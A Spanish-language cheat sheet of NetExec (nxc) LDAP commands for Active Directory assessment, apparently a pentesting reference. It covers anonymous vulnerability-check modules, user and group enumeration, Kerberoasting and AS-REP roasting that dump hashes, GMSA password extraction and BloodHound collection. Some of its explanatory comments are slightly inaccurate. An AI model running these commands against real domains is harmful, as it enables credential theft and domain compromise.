nxc ldap
se usa para interactuar con un servidor LDAP.
- Las diferentes opciones -u, -p, y -M especifican el usuario, contraseña y módulo de acción, respectivamente.
- El uso de diferentes módulos (-M) permite realizar tareas como enumeración de usuarios, verificación de vulnerabilidades como Zerologon o PetitPotam, y kerberoasting, entre otras.
- Las opciones adicionales como –gmsa o –trusted-for-delegation permiten obtener detalles específicos de la configuración de los usuarios y cuentas del dominio.
# Realizar un escaneo LDAP en el objetivo con el parámetro -user-desc
nxc ldap <target> -u '' -p '' -M -user-desc
# Obtener descripciones de los usuarios en el dominio
nxc ldap <target> -u '' -p '' -M get-desc-users
# Ejecutar un verificador de LDAP para comprobar configuraciones del servidor
nxc ldap <target> -u '' -p '' -M ldap-checker
# Comprobar configuración relacionada con Veeam (Backup/Restauración)
nxc ldap <target> -u '' -p '' -M veeam
# Realizar un escaneo relacionado con 'maq' (probablemente algún tipo de auditoría)
nxc ldap <target> -u '' -p '' -M maq
# Ejecutar pruebas para comprobar configuraciones de ADCS (Active Directory Certificate Services)
nxc ldap <target> -u '' -p '' -M adcs
# Comprobar vulnerabilidad Zerologon (CVE-2020-1472)
nxc ldap <target> -u '' -p '' -M zerologon
# Comprobar vulnerabilidad PetitPotam (CVE-2021-36942)
nxc ldap <target> -u '' -p '' -M petitpotam
# Verificar si hay contraseñas con flag NO PAC (no hace parte del protocolo)
nxc ldap <target> -u '' -p '' -M nopac
# Ejecutar el comando whoami con caché de Kerberos
nxc ldap <target> -u '' -p '' --use-kcache -M whoami
# Enumerar usuarios de dominio habilitados
nxc ldap <target> -u '<username>' -p '<password>' --users
# Enumerar los grupos de dominio del servidor LDAP
nxc ldap <target> -u '<username>' -p '<password>' --groups
# Realizar Kerberoasting y guardar los hashes en el archivo hashes.kerberoasting
nxc ldap <target> -u '<username>' -p '<password>' --kerberoasting hashes.kerberoasting
# Realizar AS-REP Roasting y guardar los hashes en el archivo hashes.asreproast
nxc ldap <target> -u '<username>' -p '<password>' --asreproast hashes.asreproast
# Obtener usuarios con el flag PASSWD_NOTREQD (sin requerir contraseña)
nxc ldap <target> -u '<username>' -p '<password>' --password-not-required
# Obtener usuarios y computadoras con el flag Trusted_for_delegation
nxc ldap <target> -u '<username>' -p '<password>' --trusted-for-delegation
# Buscar objetos con el valor de admisión (admin count) igual a 1
nxc ldap <target> -u '<username>' -p '<password>' --admin-count
# Obtener el SID (Security Identifier) del dominio
nxc ldap <target> -u '<username>' -p '<password>' --get-sid
# Enumerar contraseñas de GMSA (Group Managed Service Accounts)
nxc ldap <target> -u '<username>' -p '<password>' --gmsa
# Enumerar contraseñas de GMSA con clave (key) adicional
nxc ldap <target> -u '<username>' -p '<password>' --gmsa -k
# Convertir un ID específico de GMSA
nxc ldap <target> -u '<username>' -p '<password>' --gmsa-convert-id <ID>
# Desencriptar una cuenta GMSA en LSA (Local Security Authority)
nxc ldap <target> -u '<username>' -p '<password>' --gmsa-decrypt-lsa <ACCOUNT>
# Buscar delegaciones en el servidor LDAP
nxc ldap <target> -u '<username>' -p '<password>' --find-delegation
# Obtener información de red del dominio en todos los objetos
nxc ldap <target> -u '<username>' -p '<password>' -M get-network -o ALL=true
# Ejecutar un escaneo con BloodHound para enumerar relaciones y permisos de delegación
nxc ldap <target> -u '<username>' -p '<password>' --dns-server <dns-server ip> --bloodhound -c All
# Ejecutar un escaneo con BloodHound sobre servidor DNS específico, incluyendo la caché de Kerberos
nxc ldap <target> -u '<username>' --use-kcache --bloodhound --dns-tcp --dns-server <target> -c All